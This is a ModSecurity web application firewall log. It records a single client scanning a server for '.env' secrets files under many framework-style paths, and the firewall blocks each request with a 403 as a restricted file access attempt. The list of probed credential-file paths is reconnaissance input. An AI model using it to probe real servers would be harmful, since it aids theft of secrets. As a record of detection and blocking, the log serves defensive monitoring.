[Mon May 11 18:03:23.604924 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/shop/.env"] [unique_id "agH9y0WKUxpmnkK7zHyh_AAAAQ4"]
[Mon May 11 18:03:23.605227 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9y0WKUxpmnkK7zHyh_AAAAQ4"]
[Mon May 11 18:03:23.795210 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /store/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/store/.env"] [unique_id "agH9y0WKUxpmnkK7zHyh_gAAAQ4"]
[Mon May 11 18:03:23.795440 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/store/.env"] [unique_id "agH9y0WKUxpmnkK7zHyh_gAAAQ4"]
[Mon May 11 18:03:23.795723 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9y0WKUxpmnkK7zHyh_gAAAQ4"]
[Mon May 11 18:03:24.345276 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/saas/.env"] [unique_id "agH9zEWKUxpmnkK7zHyiAgAAAQ4"]
[Mon May 11 18:03:24.345564 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/saas/.env"] [unique_id "agH9zEWKUxpmnkK7zHyiAgAAAQ4"]
[Mon May 11 18:03:24.345994 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9zEWKUxpmnkK7zHyiAgAAAQ4"]
[Mon May 11 18:03:24.625387 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/client/.env"] [unique_id "agH9zEWKUxpmnkK7zHyiBAAAAQ4"]
[Mon May 11 18:03:24.625603 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/client/.env"] [unique_id "agH9zEWKUxpmnkK7zHyiBAAAAQ4"]
[Mon May 11 18:03:24.625871 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9zEWKUxpmnkK7zHyiBAAAAQ4"]
[Mon May 11 18:03:24.891850 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/project/.env"] [unique_id "agH9zEWKUxpmnkK7zHyiBQAAAQ4"]
[Mon May 11 18:03:24.892062 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/project/.env"] [unique_id "agH9zEWKUxpmnkK7zHyiBQAAAQ4"]
[Mon May 11 18:03:24.892360 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9zEWKUxpmnkK7zHyiBQAAAQ4"]
[Mon May 11 18:03:25.130581 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/admin-panel/.env"] [unique_id "agH9zUWKUxpmnkK7zHyiBgAAAQ4"]
[Mon May 11 18:03:25.130830 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/admin-panel/.env"] [unique_id "agH9zUWKUxpmnkK7zHyiBgAAAQ4"]
[Mon May 11 18:03:25.131179 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9zUWKUxpmnkK7zHyiBgAAAQ4"]
[Mon May 11 18:03:25.404968 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /control-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/control-panel/.env"] [unique_id "agH9zUWKUxpmnkK7zHyiBwAAAQ4"]
[Mon May 11 18:03:25.405245 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/control-panel/.env"] [unique_id "agH9zUWKUxpmnkK7zHyiBwAAAQ4"]
[Mon May 11 18:03:25.405547 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9zUWKUxpmnkK7zHyiBwAAAQ4"]
[Mon May 11 18:03:25.634287 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /user-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/user-panel/.env"] [unique_id "agH9zUWKUxpmnkK7zHyiCgAAAQ4"]
[Mon May 11 18:03:25.634516 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/user-panel/.env"] [unique_id "agH9zUWKUxpmnkK7zHyiCgAAAQ4"]
[Mon May 11 18:03:25.634836 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9zUWKUxpmnkK7zHyiCgAAAQ4"]
[Mon May 11 18:03:25.867954 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/node/.env"] [unique_id "agH9zUWKUxpmnkK7zHyiDAAAAQ4"]
[Mon May 11 18:03:25.868203 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/node/.env"] [unique_id "agH9zUWKUxpmnkK7zHyiDAAAAQ4"]
[Mon May 11 18:03:25.868504 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9zUWKUxpmnkK7zHyiDAAAAQ4"]
[Mon May 11 18:03:26.092672 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /express/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/express/.env"] [unique_id "agH9zkWKUxpmnkK7zHyiDQAAAQ4"]
[Mon May 11 18:03:26.092906 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/express/.env"] [unique_id "agH9zkWKUxpmnkK7zHyiDQAAAQ4"]
[Mon May 11 18:03:26.093208 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9zkWKUxpmnkK7zHyiDQAAAQ4"]
[Mon May 11 18:03:26.299723 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /next/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/next/.env"] [unique_id "agH9zkWKUxpmnkK7zHyiDgAAAQ4"]
[Mon May 11 18:03:26.299950 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/next/.env"] [unique_id "agH9zkWKUxpmnkK7zHyiDgAAAQ4"]
[Mon May 11 18:03:26.300282 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9zkWKUxpmnkK7zHyiDgAAAQ4"]
[Mon May 11 18:03:26.663895 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nuxt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/nuxt/.env"] [unique_id "agH9zkWKUxpmnkK7zHyiDwAAAQ4"]
[Mon May 11 18:03:26.664121 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/nuxt/.env"] [unique_id "agH9zkWKUxpmnkK7zHyiDwAAAQ4"]
[Mon May 11 18:03:26.664409 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9zkWKUxpmnkK7zHyiDwAAAQ4"]
[Mon May 11 18:03:27.011329 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/nest/.env"] [unique_id "agH9z0WKUxpmnkK7zHyiEgAAAQ4"]
[Mon May 11 18:03:27.011631 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/nest/.env"] [unique_id "agH9z0WKUxpmnkK7zHyiEgAAAQ4"]
[Mon May 11 18:03:27.012049 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9z0WKUxpmnkK7zHyiEgAAAQ4"]
[Mon May 11 18:03:27.314073 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/react/.env"] [unique_id "agH9z0WKUxpmnkK7zHyiEwAAAQ4"]
[Mon May 11 18:03:27.314308 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/react/.env"] [unique_id "agH9z0WKUxpmnkK7zHyiEwAAAQ4"]
